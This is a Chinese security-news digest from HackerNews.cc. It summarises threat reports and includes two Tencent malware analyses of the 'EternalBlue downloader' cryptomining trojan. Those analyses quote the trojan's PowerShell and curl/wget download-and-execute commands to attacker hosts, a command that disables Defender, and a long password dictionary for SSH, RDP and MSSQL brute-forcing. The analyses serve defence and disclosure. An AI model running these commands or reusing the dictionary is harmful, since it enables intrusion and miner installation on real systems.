分类: 今日推送

Valak 恶意软件与 Gozi ConfCrew 的千丝万缕联系

Valak是使用基于脚本的多阶段恶意软件,该软件劫持电子邮件并嵌入恶意URL附件,以使用无文件脚本来感染设备。 相关摘要 Valak使用了基于脚本的恶意软件,这些恶意软件在广告活动中使用,其与Gozi ConfCrew相关联。 重复的攻击活动导致一些报道将Valak误认为是Gozi。 电子邮件被收集起来并运用在“回复链攻击”中,以专门构建插件“ exchgrabber”来进一步传播。 新发现的名为“ clientgrabber”的插件还用于从注册表中窃取电子邮件凭据。 有关Varak详情请见报告:https://assets.sentinelone.com/labs/sentinel-one-valak-i   … 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1246/     消息来源:sentinelone,译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

Gamaredon 威胁组织活动相关分析

研究人员发现,高度活跃的Gamaredon威胁组织在各种恶意活动中使用了未被记录的工具,其中一个是针对微软Outlook的VBA宏(使用电子邮件向受害者的Microsoft Office通讯簿中的联系人发送鱼叉式钓鱼邮件)。我们还进一步分析了Gamaredon工具,这些工具能够将恶意宏和远程模板注入到现有的Office文档中。 自2013年起Gamaredon组织开始活跃。CERT-UA和乌克兰其他官方机构的报告中证实了它曾对乌克兰机构发起了袭击。在过去的几个月里,这个群体的活动有所增加,不断有恶意邮件袭击他们目标的邮箱。这些电子邮件的附件是带有恶意宏的文档,在执行时会尝试下载多种不同的恶意软件变种。Gamaredon使用了许多不同的编程语言,从 c#到VBScript、批处理文件和c/c++。 Gamaredon使用的工具非常简单,旨在从受到威胁的系统中收集敏感信息并进一步传播。与其他APT组织不同的是,Gamaredon组织行为却非常高调。尽管他们的工具具有下载和执行更隐秘的任意二进制文件的能力,但该小组的主要重点却是在试图窃取数据的同时,在目标网络中尽可能快地传播。   … 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1245/     消息来源:welivesecurity,译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接  

“黑球”行动再升级,SMBGhost 漏洞攻击进入实战

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/ZoiKCTEaxhXIXsI4OzhWvA   一、概述 2020年6月10日,腾讯安全威胁情报中心检测到永恒之蓝下载器木马出现变种。此次变种在上个版本“黑球”行动中检测SMBGhost漏洞的基础上首次启用SMBGhost漏洞攻击,之前的若干种病毒只是利用SMBGhost漏洞做扫描检测,并无实质性攻击利用。本次更新还启用了SSH爆破以及新增Redis爆破能力攻击Linux系统。 由于SMBGhost漏洞CVE-2020-0796利用Windows SMB漏洞远程攻击获取系统最高权限,可直接攻击SMB服务造成RCE(远程代码执行),存在漏洞的计算机只要联网就可能被黑客探测攻击,并获得系统最高权限。该攻击行动使得“永恒之蓝”系列木马针对Windows系统的攻击能力再次增强。 腾讯安全威胁情报中心曾多次发布SMBGhost漏洞风险提示,至今仍有近三分之一的系统未修补该漏洞,我们再次强烈建议所有用户尽快修补SMBGhost漏洞(CVE-2020-0796)。 此外永恒之蓝下载器木马还新增了针对Linux系统的远程攻击,在失陷系统创建定时任务并植入挖矿木马功能,使得其攻击的范围继续扩大,包括云上Linux主机等都可能成为攻击目标。永恒之蓝本次更新的主要目的是释放挖矿木马,并会按照惯例在开始挖矿前,清除其他挖矿木马,以便独占系统资源。挖矿活动会大量消耗企业服务器资源,使正常业务受严重影响。 二、样本分析 攻击模块if.bin在smbghost_exec函数中利用从hxxp://d.ackng.com/smgh.bin下载的SMBGhost漏洞攻击程序发起攻击,攻击成功后远程执行以下shellcode: powershell IEx(New-Object Net.WebClient).DownLoadString(''http[:]///t.amynx.com/smgho.jsp?0.8*%computername%'') 针对Linux系统服务器的攻击 1、利用SSH爆破 扫描22端口进行探测,针对Linux系统root用户,尝试利用弱密码进行爆破连接,爆破使用密码字典: “saadmin”,”123456″,”test1″,”zinch”,”g_czechout”,”asdf”,”Aa123456.”,”dubsmash”,”password”,”PASSWORD”,”123.com”,”admin@123″,”Aa123456″,”qwer12345″,”Huawei@123″,”123@abc”,”golden”,”123!@#qwe”,”1qaz@WSX”,”Ab123″,”1qaz!QAZ”,”Admin123″,”Administrator”,”Abc123″,”Admin@123″,”999999″,”Passw0rd”,”123qwe!@#”,”football”,”welcome”,”1″,”12″,”21″,”123″,”321″,”1234″,”12345″,”123123″,”123321″,”111111″,”654321″,”666666″,”121212″,”000000″,”222222″,”888888″,”1111″,”555555″,”1234567″,”12345678″,”123456789″,”987654321″,”admin”,”abc123″,”abcd1234″,”abcd@1234″,”abc@123″,”p@ssword”,”P@ssword”,”p@ssw0rd”,”P@ssw0rd”,”P@SSWORD”,”P@SSW0RD”,”P@w0rd”,”P@word”,”iloveyou”,”monkey”,”login”,”passw0rd”,”master”,”hello”,”qazwsx”,”password1″,”Password1″,”qwerty”,”baseball”,”qwertyuiop”,”superman”,”1qaz2wsx”,”fuckyou”,”123qwe”,”zxcvbn”,”pass”,”aaaaaa”,”love”,”administrator”,”qwe1234A”,”qwe1234a”,” “,”123123123″,”1234567890″,”88888888″,”111111111″,”112233″,”a123456″,”123456a”,”5201314″,”1q2w3e4r”,”qwe123″,”a123456789″,”123456789a”,”dragon”,”sunshine”,”princess”,”!@#$%^&*”,”charlie”,”aa123456″,”homelesspa”,”1q2w3e4r5t”,”sa”,”sasa”,”sa123″,”sql2005″,”sa2008″,”abc”,”abcdefg”,”sapassword”,”Aa12345678″,”ABCabc123″,”sqlpassword”,”sql2008″,”11223344″,”admin888″,”qwe1234″,”A123456″,”OPERADOR”,”Password123″,”test123″,”NULL”,”user”,”test”,”Password01″,”stagiaire”,”demo”,”scan”,”P@ssw0rd123″,”xerox”,”compta” 爆破登陆成功后执行远程命令: `Src=ssho;(curl -fsSL http[:]//t.amynx.com/ln/core.png?0.8*ssho*`whoami`*`hostname`||wget -q -O- http[:]//t.amynx.com/ln/core.png?0.8*ssho*`whoami`*`hostname`) | bash` 2、利用Redis未授权访问漏洞 扫描6379端口进行探测,在函数redisexec中尝试连接未设置密码的redis服务器,访问成功后执行远程命令: `export src=rdso;curl -fsSL t.amynx.com/ln/core.png?rdso|bash` SSH爆破和Redis爆破登陆成功均会执行Linux Shell脚本core.png,该脚本主要有以下功能: a.创建crontab定时任务下载和执行脚本http[:]//t.amynx.com/ln/a.asp b.创建crontab定时启动Linux平台挖矿木马/.Xll/xr 通过定时任务执行的a.asp首先会清除竞品挖矿木马: 然后通过获取/root/.sshown_hosts中记录的本机SSH登陆过的IP,重新与该机器建立连接进行内网扩散攻击: 创建目录/.Xll并下载挖矿木马(d[.]ackng.com/ln/xr.zip)到该目录下,解压得到xr并连接矿池lplp.ackng.com:444启动挖矿。 永恒之蓝下载器木马自2018年底诞生以来一直处于高度活跃状态,目前该木马会通过以下方法进行扩散传播: 截止2020年6月12日,永恒之蓝木马下载器家族主要版本更新列表如下: IOCs Domain t.amynx.com t.zer9g.com t.zz3r0.com d.ackng.com URL http[:]//t.amynx.com/smgh.jsp http[:]//t.amynx.com/a.jsp http[:]//t.amynx.com/ln/a.asp http[:]//t.amynx.com/ln/core.png http[:]//d.ackng.com/if.bin http[:]//d.ackng.com/smgh.bin http[:]//d.ackng.com/ln/xr.zip

谷歌遭亚利桑那州司法部长起诉 被指欺诈用户

据外媒报道,当地时间周三,谷歌受到来自亚利桑那州司法部长Mark Brnovich提起的诉讼,后者指控这家搜索巨头欺骗用户并从他们的手机中收集位置数据。我们知道,谷歌的绝大部分收入来自其庞大的广告业务,而谷歌在用户使用其产品时收集的个人信息为其提供了支撑。 对此,Brnovich在Twitter上发文指出,用户被一种虚假的安全感欺骗了,因为谷歌让用户认为他们禁用了位置数据收集的设置,而实际上这些设置仍旧是处于开启状态。 该诉讼要求谷歌提供损害赔偿,但具体金额尚不清楚。Brnovich的办公室也没有回复记者的置评请求。 谷歌则有在一份声明中为自己关于位置数据的政策进行过辩护。发言人Jose Castaneda表示:”司法部长和收取诉讼费用的律师似乎错误地描述了我们的服务。我们一直在我们的产品中内置了隐私功能并为位置数据提供了强大的控制。我们期待澄清事实。”     (稿源:cnBeta,封面源自网络。)  

通过 Netwire 攻击链对意大利进行网络攻击

信息窃取软件是常见的恶意软件之一。 如:多平台远程管理工具(RAT)Netwire (MITRE S0198)从2012年开始被网络犯罪组织不断使用。在我们进行网络监测期间,发现了一个特定的Office文档,该文档通过安装恶意软件插件,来对意大利人民发起隐藏性的网络攻击活动,这种攻击活动的特定供给链采取了独特的技术模式,类似于这种,本文将对此进行深入分析。   … 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1238/     消息来源:yoroi, 译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

任天堂就账号被黑事件发布最新声明:共有 30 万账号被入侵

在过去几个月时间里,任天堂被黑客入侵的用户账号数量几乎翻了一番。这家日本游戏巨头最初披露信息称,共有16万个任天堂账号遭到入侵,泄露的个人信息包括账号所有者的姓名、电子邮件地址、出生日期和居住国等。但据任天堂公布的更新声明显示,另有14万个账号被泄露。声明称,继续调查的结果使得这一数字上升。任天堂表示,该公司重新设置了这些账号的密码,并与受影响用户取得了联系。声明重申,任天堂的所有账号中仅有不到1%受到了此次黑客入侵事件的影响。 账号信息泄露的消息最早是在3月传出的,当时任天堂用户抱怨称其账号在未经许可的情况下被收取了数字物品费用。 任天堂4月发布Twitter消息称,用户应为自己的账号启用双因素身份验证功能,但并未说明原因。两周之后,任天堂才承认大量账号被不当访问,但仍未透露这些账户是如何被访问的,只是声称黑客通过“我们服务以外的某种方式”获得了密码,从而获得了账号的访问权限。这意味着用户可能使用了保密性较弱的密码,或者重复使用了在其他服务中已被破解的密码,并被黑客用来入侵其任天堂账号。     (稿源:新浪科技,封面源自网络。)

IBM 开源 FHE 工具包,在数据处理过程中也能进行加密

现代加密技术令人们可以在传输和存储过程中保护敏感数据,但在数据处理时,却几乎无法对其进行保护。而完全同态加密(Fully Homomorphic Encryption,FHE)技术能够解决这一难题,它允许在保持加密状态的情况下对数据进行操作,最大程度上降低了数据暴露的风险。 起初,允许对加密数据进行处理的密码方案仅限于部分同态方案,该方案只能支持一种基本操作,即加法或乘法,无法同时支持两者。2009 年,IBM 在这方面取得了重大进展,并发明了完全同态加密,它同时支持两种基本操作,因此可以在不访问数据的情况下进行数据处理。结合其他技术,FHE 还可以有选择地限制解密功能,人们只能看到他们有权访问的文件部分。近年来,由于算法的发展,完全同态加密已达到拐点,其性能正在变得更加实用。 FHE 在许多用例中都具有重大前景,包括但不限于:从私人数据中提取价值(例如分析用户数据)、数据集交集、基因组学分析、不显示意图的查询和安全的外包。IBM 指出,FHE 特别适合金融和医疗保健等行业,因为该技术可以广泛共享财务信息或患者健康记录,同时限制了对除必要数据以外的所有数据的访问。 但 FHE 的要求会使开发者所习惯的编程范例发生变化,将它集成到应用程序中不是一件易事。因此,IBM 开发并开源了一套工具包,帮助开发人员简单、快速地启用这项技术。 目前,适用于 MacOS 和 iOS 的新 FHE 工具包已发布,Linux 和 Android 的将于数周之内提供。根据 IBM 的介绍,每个工具包都基于 HELib(世界上最成熟、功能最全的加密库),其中包含一些示例程序,可简化基于 FHE 的代码的编写。iOS 工具包还提供了对加密数据库的隐私保护搜索的简单演示。 IBM 表示,希望尽快将这项技术推出去,交付给早期采用者;希望在建立用户和用例社区时,这些概念变得不那么抽象,更具体。     (稿源:开源中国,封面源自网络。)

卡巴斯基报告:针对 Cycldek 黑客组织知识鸿沟的相关信息

在调查关于Cycldek组织2018年后有关攻击活动时,发现对该组织的信息了解甚少。本文旨在弥合对该组织的知识鸿沟,了解其最新活动和操作方式。以下是关于该组织的相关信息: Cycldek(也称为Goblin Panda和Conimes)在过去两年中一直很活跃,对东南亚地区国家政府进行了针对性的攻击活动。 相关活动的分析显示了两种不同的模式,表明该组织是由一个领导管理的两个运营实体组成。 我们检测发现到了用于目标网络的横向移动和信息窃取的工具,其中包括自定义工具、未报告工具以及二进制文件。 最新公布的工具之一被命名为USBCulprit,其通过USB媒体来提取受害者的数据。这表明Cycldek可能正试图到达受害者环境中的气隙网络,或依靠物理存在达到同样的目的。   … 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1230/     消息来源:securelist, 译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

永恒之蓝木马下载器发起 “黑球”行动,新增 SMBGhost 漏洞检测能力

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/QEE95HTKzuT4-NykfvHfGQ   一、背景 腾讯安全威胁情报中心检测到永恒之蓝下载器木马出现最新变种,此次变种的病毒延续上个版本的邮件蠕虫攻击方法,利用附带Office漏洞CVE-2017-8570漏洞的doc文档以及JS诱饵文件发送与新冠肺炎主题相关的钓鱼邮件。同时新增SMBGhost(CVE-2020-0796)漏洞检测和上报、新增SSH爆破攻击相关代码,推测其可能在后续攻击活动中利用SMBGhost漏洞、也可能发起针对Linux系统的攻击。 病毒Payload执行时安装随机名计划任务从新的C2地址t.zer9g.com、t.zz3r0.com下载a.jsp进行持久化攻击,a.jsp继续下载攻击模块if.bin、if_mail.bin以利用漏洞、弱口令爆破、钓鱼邮件群发等方式进行攻击传播,将XMRig门罗币矿机程序m6.bin、m6g.bin注入Powershell.exe运行。病毒还会安装没有实际功能的计划任务blackball(“黑球”),因此将此次攻击命名为“黑球”行动。 二、样本分析 1.钓鱼邮件攻击 首先从outlook应用程序会话中获取邮箱联系人。 然后自动生成readme.doc,readme.js两种附件文件,并将readme.js制作为压缩包readme.zip。其中readme.doc中包含Office漏洞CVE-2017-8570触发代码。readme.js中包含恶意Wscript脚本攻击代码。两种附件被打开后都会执行恶意命令下载http[:]//d.ackng.com/mail.jsp。 在$mail.Body中添加待发送邮件的邮件主题内容,从预置的9个主题中随机选择,主要包含“新冠肺炎COVID-19”, “日常联系对话”,“文件损坏无法查看”三种类型,具体内容如下: 生成的钓鱼邮件示例如下: 最后针对邮箱中发现的每一个联系人,依次发送包含恶意代码的附件readme.doc、readme.zip的邮件。 2.弱口令爆破 RDP(3389端口)弱口令爆破 爆破用户名:“administrator”,密码字典: `”saadmin”,“123456”,“test1”,“zinch”,“g_czechout”,“asdf”,“Aa123456.”,“dubsmash”,“password”,“PASSWORD”,“123.com”,“admin@123”,“Aa123456”,“qwer12345”,“Huawei@123”,“123@abc”,“golden”,“123!@#qwe”,“1qaz@WSX”,“Ab123”,“1qaz!QAZ”,“Admin123”,“Administrator”,“Abc123”,“Admin@123”,“999999”,“Passw0rd”,“123qwe!@#”,“football”,“welcome”,“1”,“12”,“21”,“123”,“321”,“1234”,“12345”,“123123”,“123321”,“111111”,“654321”,“666666”,“121212”,“000000”,“222222”,“888888”,“1111”,“555555”,“1234567”,“12345678”,“123456789”,“987654321”,“admin”,“abc123”,“abcd1234”,“abcd@1234”,“abc@123”,“p@ssword”,“P@ssword”,“p@ssw0rd”,“P@ssw0rd”,“P@SSWORD”,“P@SSW0RD”,“P@w0rd”,“P@word”,“iloveyou”,“monkey”,“login”,“passw0rd”,“master”,“hello”,“qazwsx”,“password1”,“Password1”,“qwerty”,“baseball”,“qwertyuiop”,“superman”,“1qaz2wsx”,“fuckyou”,“123qwe”,“zxcvbn”,“pass”,“aaaaaa”,“love”,“administrator”,“qwe1234A”,“qwe1234a”,“123123123”,“1234567890”,“88888888”,“111111111”,“112233”,“a123456”,“123456a”,“5201314”,“1q2w3e4r”,“qwe123”,“a123456789”,“123456789a”,“dragon”,“sunshine”,“princess”,“!@#$%^&*”,“charlie”,“aa123456”,“homelesspa”,“1q2w3e4r5t”,“sa”,“sasa”,“sa123”,“sql2005”,“sa2008”,“abc”,“abcdefg”,“sapassword”,“Aa12345678”,“ABCabc123”,“sqlpassword”,“sql2008”,“11223344”,“admin888”,“qwe1234”,“A123456”,“OPERADOR”,“Password123”,“test123”,“NULL”,“user”,“test”,“Password01”,“stagiaire”,“demo”,“scan”,“P@ssw0rd123”,“xerox”,“compta”`。 爆破成功后会上报该机器的IP以及此次成功登陆使用的密码,然后利用rdpexec模块远程执行代码$rdp_code: cmd /c powershell Set-MpPreference-DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionProcess c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe&powershellIEX(New-Object Net.WebClient).DownloadString(”http[:]//t.amynx.com/rdp.jsp”) SMB爆破攻击(445端口) 爆破使用用户名为”administrator”,”admin”,爆破成功后远程执行代码$ipc_code: MSSQL爆破攻击(1433端口) 使用与RDP爆破同样的密码字典,爆破成功后远程执行代码$mscmd_code: 此外,最新的攻击代码中还加如了SSH爆破相关命令,该代码将会启动SSH爆破模块,并在爆破成功后执行远程命令$ssh_cmd。但是目前该功能并未启用,相关可能还在开发阶段,后续如果启用之后,可能会导致被感染的Windows机器通过SSH爆破攻击Linux系统。 3.漏洞攻击 1)   SMBGhost漏洞利用 永恒之蓝下载器木马变种会利用公开的漏洞检测代码检测存在SMBGhost漏洞(编号:CVE-2020-0796、绰号:永恒之黑)的机器IP并上报。 2020年3月12日腾讯安全威胁情报中心发布了SMBv3远程代码执行漏洞CVE-2020-0796(别名:SMBGhost,绰号:永恒之黑)预警公告:https://mp.weixin.qq.com/s/zwuDziMherWbUY2S2rrD8Q 2020年6月2日,国外安全研究员公开了一份SMBGhost漏洞CVE-2020-0796漏洞的RCE代码,腾讯安全团队已对其进行分析并预警:https://mp.weixin.qq.com/s/LDWRacyVMAu2JGZUJf3qKQ 该漏洞的后果十分接近永恒之蓝系列,都利用Windows SMB漏洞远程攻击获取系统最高权限,除了直接攻击SMB服务端造成RCE外,攻击者可以构造特定的网页,压缩包,共享目录,OFFICE文档等多种方式触发漏洞进行攻击。由于漏洞利用源代码被公布,使得漏洞利用风险骤然升级,被黑灰产修改即可用于网络攻击。 2)   永恒之蓝漏洞利用 利用永恒之蓝漏洞攻击,攻击后远程执行代码$sc_code。 3)   Lnk漏洞(CVE-2017-8464)利用 Lnk漏洞利用CVE-2017-8464,在可移动盘、网络磁盘下创建具有CVE-2017-8464漏洞攻击代码的Lnk文件,一旦该文件被查看就会导致恶意代码执行。同时还会释放JS文件readme.js,通过伪装的文件在被误点击时感染病毒。 4.清除竞品挖矿木马 永恒之蓝下载器木马在攻击代码if.bin中Killer()函数中会详细地搜集大量竞争对手挖矿木马的信息,包括各类挖矿木马安装的服务、计划任务、进程名,以及挖矿使用的命令行特点、端口号特点来锁定目标并进行清除。 通过服务名匹配: `$SrvName =“xWinWpdSrv”, “SVSHost”, “Microsoft Telemetry”, “lsass”, “Microsoft”, “system”, “Oracleupdate”, “CLR”, “sysmgt”, “\gm”, “WmdnPnSN”, “Sougoudl”,“National”, “Nationaaal”, “Natimmonal”, “Nationaloll”, “Nationalmll”,“Nationalaie”,“Nationalwpi”,“WinHelp32”,“WinHelp64”, “Samserver”, “RpcEptManger”, “NetMsmqActiv Media NVIDIA”, “Sncryption Media Playeq”,“SxS”,“WinSvc”,“mssecsvc2.1”,“mssecsvc2.0”,“Windows_Update”,“Windows Managers”,“SvcNlauser”,“WinVaultSvc”,“Xtfy”,“Xtfya”,“Xtfyxxx”,“360rTys”,“IPSECS”,“MpeSvc”,“SRDSL”,“WifiService”,“ALGM”,“wmiApSrvs”,“wmiApServs”,“taskmgr1”,“WebServers”,“ExpressVNService”,“WWW.DDOS.CN.COM”,“WinHelpSvcs”,“aspnet_staters”,“clr_optimization”,“AxInstSV”,“Zational”,“DNS Server”,“Serhiez”,“SuperProServer”,“.Net CLR”,“WissssssnHelp32”,“WinHasdadelp32”,“WinHasdelp32”,“ClipBooks”` 通过计划任务名匹配: `$TaskName = “my1″,”Mysa”, “Mysa1”, “Mysa2”, “Mysa3”, “ok”, “Oracle Java”, “Oracle Java Update“, “Microsoft Telemetry“, “Spooler SubSystem Service“,”Oracle Products Reporter“, “Update service for products“, “gm“, “ngm“,”Sorry“,”Windows_Update“,”Update_windows“,”WindowsUpdate1“,”WindowsUpdate2“,”WindowsUpdate3“,”AdobeFlashPlayer“,”FlashPlayer1“,”FlashPlayer2“,”FlashPlayer3“,”IIS“,”WindowsLogTasks“,”System Log Security Check“,”Update“,”Update1“,”Update2“,”Update3“,”Update4“,”DNS“,”SYSTEM“,”DNS2“,”SYSTEMa“,”skycmd“,”Miscfost“,”Netframework“,”Flash“,”RavTask“,”GooglePingConfigs“,”HomeGroupProvider“,”MiscfostNsi“,”WwANsvc“,”Bluetooths“,”Ddrivers“,”DnsScan“,”WebServers“,”Credentials“,”TablteInputout“,”werclpsyport“,”HispDemorn“,”LimeRAT-Admin“,”DnsCore“,”Update service for Windows Service“,”DnsCore“,”ECDnsCore“` 通过命令行特征匹配: `$_.CommandLine -like‘*pool.monero.hashvault.pro*’ –Or $_.CommandLine -like ‘*blazepool*’ –Or$_.CommandLine -like ‘*blockmasters*’ –Or $_.CommandLine -like‘*blockmasterscoins*’ –Or $_.CommandLine -like ‘*bohemianpool*’ –Or$_.CommandLine -like ‘*cryptmonero*’ –Or $_.CommandLine -like ‘*cryptonight*’–Or $_.CommandLine -like ‘*crypto-pool*’ –Or $_.CommandLine -like‘*–donate-level*’ –Or $_.CommandLine -like ‘*dwarfpool*’ –Or $_.CommandLine-like ‘*hashrefinery*’ –Or $_.CommandLine -like ‘*hashvault.pro*’ –Or$_.CommandLine -like ‘*iwanttoearn.money*’ –Or $_.CommandLine -like‘*–max-cpu-usage*’ –Or $_.CommandLine -like ‘*mine.bz*’ –Or $_.CommandLine-like ‘*minercircle.com*’ –Or $_.CommandLine -like ‘*minergate*’ –Or$_.CommandLine -like ‘*miners.pro*’ –Or $_.CommandLine -like ‘*mineXMR*’ –Or$_.CommandLine -like ‘*minexmr*’ –Or $_.CommandLine -like ‘*mineXMR*’ –Or$_.CommandLine -like ‘*mineXMR*’ –Or $_.CommandLine -like‘*miningpoolhubcoins*’ –Or $_.CommandLine -like ‘*mixpools.org*’ –Or$_.CommandLine -like ‘*mixpools.org*’ –Or $_.CommandLine -like ‘*monero*’ –Or$_.CommandLine -like ‘*monero*’ –Or $_.CommandLine -like‘*monero.lindon-pool.win*’ –Or $_.CommandLine -like ‘*moriaxmr.com*’ –Or $_.CommandLine-like ‘*mypool.online*’ –Or $_.CommandLine -like ‘*nanopool.org*’ –Or$_.CommandLine -like ‘*nicehash*’ –Or $_.CommandLine -like ‘*-p x*’ –Or$_.CommandLine -like ‘*pool.electroneum.hashvault.pro*’ –Or $_.CommandLine-like ‘*pool.xmr*’ –Or $_.CommandLine -like ‘*poolto.be*’ –Or $_.CommandLine-like ‘*prohash*’ –Or $_.CommandLine -like ‘*prohash.net*’ –Or $_.CommandLine-like ‘*ratchetmining.com*’ –Or $_.CommandLine -like ‘*slushpool*’ –Or$_.CommandLine -like ‘*stratum+*’ –Or $_.CommandLine -like ‘*suprnova.cc*’ –Or$_.CommandLine -like ‘*teracycle.net*’ –Or $_.CommandLine -like ‘*usxmrpool*’–Or $_.CommandLine -like ‘*viaxmr.com*’ –Or $_.CommandLine -like ‘*xmrpool*’–Or $_.CommandLine -like ‘*yiimp*’ –Or $_.CommandLine -like ‘*zergpool*’ –Or $_.CommandLine-like ‘*zergpoolcoins*’ –Or $_.CommandLine -like ‘*zpool*’` 通过网络端口匹配: `($psids[0] -eq $line[-1]) –and $t.contains(“ESTABLISHED”) –and ($t.contains(“:1111”) –or $t.contains(“:2222”) –or $t.contains(“:3333”) –or $t.contains(“:4444”) –or $t.contains(“:5555”) –or $t.contains(“:6666”) –or $t.contains(“:7777”) –or $t.contains(“:8888”) –or $t.contains(“:9999”) –or $t.contains(“:14433”) –or $t.contains(“:14444”) –or $t.contains(“:45560”) –or $t.contains(“:65333”))` 通过进程名匹配: `$Miner =“SC”,“WerMgr”,“WerFault”,“DW20”,“msinfo”, “XMR*”,“xmrig*”, “minerd”, “MinerGate”, “Carbon”, “yamm1”, “upgeade”, “auto-upgeade”, “svshost”, “SystemIIS”, “SystemIISSec”, &apos;WindowsUpdater*&apos;, “WindowsDefender*”, “update”, “carss”, “service”, “csrsc”, “cara”, “javaupd”, “gxdrv”, “lsmosee”, “secuams”, “SQLEXPRESS_X64_86”, “Calligrap”, “Sqlceqp”, “Setting”, “Uninsta”, “conhoste”,“Setring”,“Galligrp”,“Imaging”,“taskegr”,“Terms.EXE”,“360”,“8866”,“9966”,“9696”,“9797”,“svchosti”,“SearchIndex”,“Avira”,“cohernece”,“win”,“SQLforwin”,“xig*”,“taskmgr1”,“Workstation”,“ress”,“explores”` 5.执行Payload 通过爆破、RCE漏洞攻击、钓鱼邮件攻击后会下载和执行Powershell代码: http[:]//t.amynx.com/mail.jsp或http[:]//t.amynx.com/usb.jsp mail.jsp更新C2地址为:t.amynx.com、t.zer9g.com、t.zz3r0.com,并且安装计划任务blackball(“黑球”),该计划任务无实际代码执行。 然后mail.jsp安装三个随机名计划任务(分别为<random>、<random>\<random>、MicroSoft\Windows\<random>),执行命令为“PS_CMD”。之后三个计划任务中的命令“PS_CMD”被替换为下载和执行Powershell代码http[:]//t.awcna.com/a.jsp、http[:]//t.zer9g.com/a.jsp、http[:]//t.zz3r0.com /a.jsp以达到持久化攻击。 a.jsp负责下载攻击模块if.bin执行漏洞利用和弱口令爆破功能。下载门罗币挖矿模块m6.bin、m6g.bin,并通过Invoke-ReflectivePEInjection将XMR挖矿木马注入Powershell.exe运行,连接矿池lplp.ackng.com:443挖矿,导致CPU占用率接近100%。 将OutLook注册表 “*\Outlook\Security”下的ObjectModelGuard值设为2,即不对outlook任何可疑活动进行提示。 然后下载和执行Powershell版邮件蠕虫攻击程序http[:]//d.ackng.com/if_mail.bin,获取邮箱所有联系人,依次发送钓鱼邮件,进入下一轮攻击流程。 6.历次版本修改 根据腾讯安全威胁情报中心持续跟踪结果,永恒之蓝下载器木马在2018~2020间,已升级十余次,历次变化情况如下: IOCs Domain t.amynx.com t.zer9g.com t.zz3r0.com d.ackng.com   URL: http[:]//d.ackng.com/if_mail.bin http[:]//d.ackng.com/if.bin http[:]//t.zer9g.com/a.jsp http[:]//t.zz3r0.com/a.jsp http[:]//t.amynx.com/mail.jsp   md5 参考链接: https://mp.weixin.qq.com/s/bibSEjfLnuOA9vyEMHkv9Q https://mp.weixin.qq.com/s/LDWRacyVMAu2JGZUJf3qKQ

Himera 和 AbSent-Loader 利用 Covid19 主题传播恶意软件

我们在日常的网络监测中,对许多伪装的电子邮件进行了拦截。这些邮件利用正在发生的冠状病毒有关的FMLA(《家庭医疗休假法》)要求,使用Himera和Absent-Loader这两种网络犯罪工具对数据进行了处理。 加载程序是一种恶意代码,用于将其他恶意软件代码加载到受害者的计算机中并对数据进行窃取。攻击者们会把被盗取的信息进行售卖,来获得相应的报酬。 此恶意活动中的样本首先使用Word文档(该文档指的是可执行文件),然后再删除另一个可执行文件并进行重命名,借此来逃避检测。     … 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1226/     消息来源:yoroi, 译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接